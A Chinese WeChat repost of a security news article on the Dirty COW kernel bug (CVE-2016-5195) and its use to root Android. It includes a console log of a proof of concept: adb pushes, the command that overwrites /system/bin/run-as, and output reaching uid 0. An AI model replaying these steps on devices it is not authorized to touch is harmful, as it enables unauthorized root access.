原标题:脏牛漏洞影响范围超出想象,以后所有Android手机都能被Root?

【新朋友】点击标题下面蓝字「皮鲁安全之家」关注

【老朋友】点击右上角,分享或收藏本页精彩内容

【公众号】搜索公众号:皮鲁安全之家,或者ID :piluwill

上周,研究人员Phil Oester发现 “脏牛”漏洞,影响范围甚广,波及到2007年发布的Linux内核,一时间名声大噪。

脏牛漏洞,编号为CVE-2016-5195,是Linux内核运行时出现的竞争条件,允许攻击者实现本地提权。简而言之,攻击者利用脏牛可获得Linux设备的root权限。(详情请参考此前漏洞盒子发布的)

影响所有Android版本

脏牛刚被发现时,我们不清楚基于Linux内核的Android操作系统是否也受到了影响。发现脏牛的Phil Oester并没有检测Android系统上有否存在此漏洞。好在,另一名安全研究人员David Manouchehri对Android进行了检测,并于周日在上公布了PoC。

$ make run

ndk-build NDK_PROJECT_PATH=. APP_BUILD_=./Android.mk

make[1]: Entering directory `./CVE-2016-5195'

[armeabi] Install : dirtycow => libs/armeabi/dirtycow

[armeabi] Install : run-as => libs/armeabi/run-as

make[1]: Leaving directory `./CVE-2016-5195'

adb push libs/armeabi/dirtycow /data/local/tmp/dirtycow

[100%] /data/local/tmp/dirtycow

adb push libs/armeabi/run-as/data/local/tmp/run-as

[100%] /data/local/tmp/run-as

adb shell 'chmod 777 /data/local/tmp/run-as'

adb shell '/data/local/tmp/dirtycow /system/bin/run-as /data/local/tmp/run-as'

warning: newfile size (9464) andfile old size (17944) differ

size 17944

[*] mmap 0xb51e5000

[*] exploit (patch)

[*] currently 0xb51e5000=464c457f

[*] madvise = 0xb51e500017944

[*] madvise = 01048576

[*] /proc/self/mem 16357785601048576

[*] exploited 0xb51e5000=464c457f

adb shell /system/bin/run-as

running asuid 2000

uid 0

Manouchehri在一篇推文中提到,他利用脏牛获得了一台Android 6.0.1设备的root权限。在ArsTechnica的采访中,Manouchehri表示——Android 1.0以后的所有版本似乎都存在脏牛漏洞。

“对于熟悉Android文件系统的人来说,这个操作很简单。在我看来,利用这个漏洞,理论上可以在任何一台Android设备上实现提权,因为Android 1.0是基于Linux kernel 2.6.25的,而脏牛漏洞在2.6.22里就已经存在了。”

还有一位不愿透露姓名的独立安全研究人员表示,他与其他几人也利用脏牛漏洞写了Android的root利用代码,还为之增加了一些新的功能。在被问到为什么不愿意公开代码或者姓名时,这名研究人员表示:“我们用的是一种比较特殊的技术方式,将来还可以用在其他地方。”

下面的视频展示了这位研究人员如何用他的app,在一台HTC手机上获取root权限;这台手机通过USB数据线与电脑连接。首先执行ID命令和su命令,我们可以看到这个设备没有被root。运行“moo”之后(牛叫声!“moo”是包含这个漏洞利用代码的文件),再次执行ID命令和su命令,明显可以看到这台HTC手机被root了。

此前似乎低估了脏牛的威力

脏牛一开始出现的时候,引起了不小的反响,当时研究人员认为业界夸大了脏牛的危害,还特别制作了各种周边来嘲讽这种夸张的反应。

但是现在,脏牛的破坏力似乎已经超出了他们的预期。不过,要利用脏牛还是很难的,因为只有在多种条件都得到满足的前提下,才能触发内核的竞争条件,但是脏牛的危险仍然存在。自从脏牛被发现以来,Linux内核团队已修复多个发行版本。

*参考来源:http://news.softpedia.com/news/dirty-cow-exploit-can-root-android-devices-509590.shtml

http://arstechnica.com/security/2016/10/android-phones-rooted-by-most-serious-linux-escalation-bug-ever/

来自FreeBuf

回复

获得以下图文等信息

论坛

可进入微论坛畅谈

任意

官方机器人陪聊

首页

查看技术文档(逐步更新中)

留言

进入留言板

相册

责任编辑:

android local root,脏牛漏洞影响范围超出想象,以后所有Android手机都能被Root?相关推荐

  1. linux “大脏牛”漏洞分析(CVE-2017-1000405)

    一.背景简介 脏牛漏洞(CVE-2016–5195)是公开后影响范围最广和最深的漏洞之一,这十年来的每一个Linux版本,包括Android.桌面版和服务器版都受到其影响.恶意攻击者通过该漏洞可以轻易 ...

  2. 安天移动安全发布“大脏牛”漏洞分析报告(CVE-2017-1000405)

    一.背景简介 脏牛漏洞(CVE-2016–5195)是公开后影响范围最广和最深的漏洞之一,这十年来的每一个Linux版本,包括Android.桌面版和服务器版都受到其影响.恶意攻击者通过该漏洞可以轻易 ...

  3. Ubuntu内核提权(CVE-2017-16995)漏洞的复现脏牛漏洞

    Ubuntu内核提权漏洞的复现 这里先介绍一下漏洞,Ubuntu是一个以桌面应用为主的开源GNU/Linux操作系统,基于Debian GNU/Linux .近期有白帽子爆出 ubuntu 的最新版本 ...

  4. Linux利用脏牛漏洞提权

    实验环境:Centos6.5.ssh 实验步骤: 一.搭建实验环境 1.利用ssh连接Centos进行远程操作,在Centos6.5上安装http和php,输入yum -y install httpd ...

  5. 【内网—权限提升】——linux本地提权_脏牛漏洞提权

    文章目录 一.实验目的: 二.工具: 三.实验环境: 四.漏洞说明: 1. 原理: 2. 漏洞成因: 五.环境准备: 1. 安装Apache及php环境: 2. 安装gcc编译器(C语言编译器): 2 ...

  6. Linux脏牛漏洞提权复现

    操作系统: Linux ( CentOS 6.5) Web服务: PHP+Apache 环境搭建 第一步,配置yum源,安装PHP 进入yum目录 cd /etc/yum.repos.d/ 创建文件夹 ...

  7. android系统息屏设置_不用羡慕了!安卓8.0手机都能用上息屏显示

    原标题:不用羡慕了!安卓8.0手机都能用上息屏显示 说起息屏显示,近些年来很多采用AMOLED屏幕的手机都纷纷加入这一功能.比如三星S7 edge.小米Note 2等,即便是采用了LCD屏幕的LG,也 ...

  8. Android 12 “Bug 连连”:除了一加、三星,谷歌自家手机都被“坑”了

    相较于前面几个大版本,去年 10 月才问世的 Android 12 正式版稍显迟缓:2018 年 8 月 7 日谷歌发布 Android 9 正式版,之后 Android 10 正式版于 2019 年 ...

  9. linux系统漏洞firefart,CVE-2016-5195脏牛Linux提权复现

    漏洞编号:CVE-2016-5195 影响范围: Linux kernel >= 2.6.22(2007年发行,到今年10月18日才修复) 漏洞影响:低权限用户利用该漏洞技术可以在全版本Linu ...

最新文章

  1. 指纹锁就安全了?防火防盗还得防AI
  2. 不讲嫖德?这些年接触/使用的网页剪辑工具小汇总大总结
  3. 思科推出EnergyWise合作伙伴计划
  4. python--微信小程序获取手机号码报错
  5. 视觉特征--ORB系列
  6. Java中读取属性文件以及做资源国际化
  7. SAP Spartacus的double maintenance -使用Cherrypick进行维护工作
  8. 2017年4月19日
  9. Linux绘图函数与驱动,Linux中与驱动相关的ioctl函数
  10. 字符集ASCII、GBK、UNICODE、UTF在储存字符时的区别
  11. java应用程序如何编译运作_开发Java应用程序的基本步骤是: 1 编写源文件, 2.编译源文件, 3.运行程序。_学小易找答案...
  12. 擦地机器人排行榜_擦地机器人品牌排行榜来了,你想了解的都在这里
  13. 推荐效果线上评测:AB测试平台的设计与实现
  14. pycharm 添加已有文件
  15. 供应链金融业务如何脱颖而出?
  16. 微信小程序内嵌网页链接
  17. sql sever conver
  18. android 汉字转字节,安卓汉字转拼音
  19. 计算机声声慢音乐,有没有适合声声慢的背景音乐
  20. 自定义View之案列篇(三):仿QQ小红点

热门文章

  1. iOS CocoaPods安装教程
  2. Unity3d给纹理图片加密
  3. 报表工具怎么制作带有时间轴的记录表
  4. java 笔记本i7 i5_笔记本i7与i5的性能差多少
  5. 解决spring boot项目中Caused by: com.atomikos.icatch.RollbackException: Prepare: NO vote异常
  6. 网页设计有利于网站优化
  7. 平面设计和广告设计区别是什么?零基础学平面设计需要学哪些知识内容?
  8. java毕业设计_基于Android的人人保险App
  9. 使用for循环实现:验证“歌德巴郝猜想:任意一个大于等于4的偶数可写成两个素数之和”
  10. 动漫迷高清收集壁纸|经典动漫宫崎骏